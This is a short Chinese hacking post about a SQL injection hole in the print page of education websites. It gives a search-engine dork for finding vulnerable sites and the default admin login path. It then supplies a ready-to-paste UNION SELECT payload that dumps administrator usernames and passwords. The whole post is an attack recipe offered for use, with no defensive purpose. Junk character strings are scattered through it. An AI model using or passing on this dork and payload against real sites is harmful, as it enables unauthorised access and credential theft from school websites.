教育站打印页面漏洞
# J" g' X; z4 N# p6 }6 |百度或google搜索 inurl:info_Print.asp?ArticleID=+ q+ Y# U4 Z1 P6 ]$ X. a
默认后台:/ad_login.asp/ G# B# B, Z9 `/ \! S, X* { \
爆管理员密码:
: i" s: Z( i1 t3 w* z: }在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可; N# c, X! W+ F. S& ^' q
; X: q# B4 _) `2 Nunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
( U' t4 F5 e- y' T- t! a* I1 i
9 w' m4 _4 O" s) z作者:佚名
( p5 w* L3 Q2 C( c* r6 x W 1 i6 t* |2 P7 j. \4 h6 R5 e
# s1 T: f8 T$ }& Q |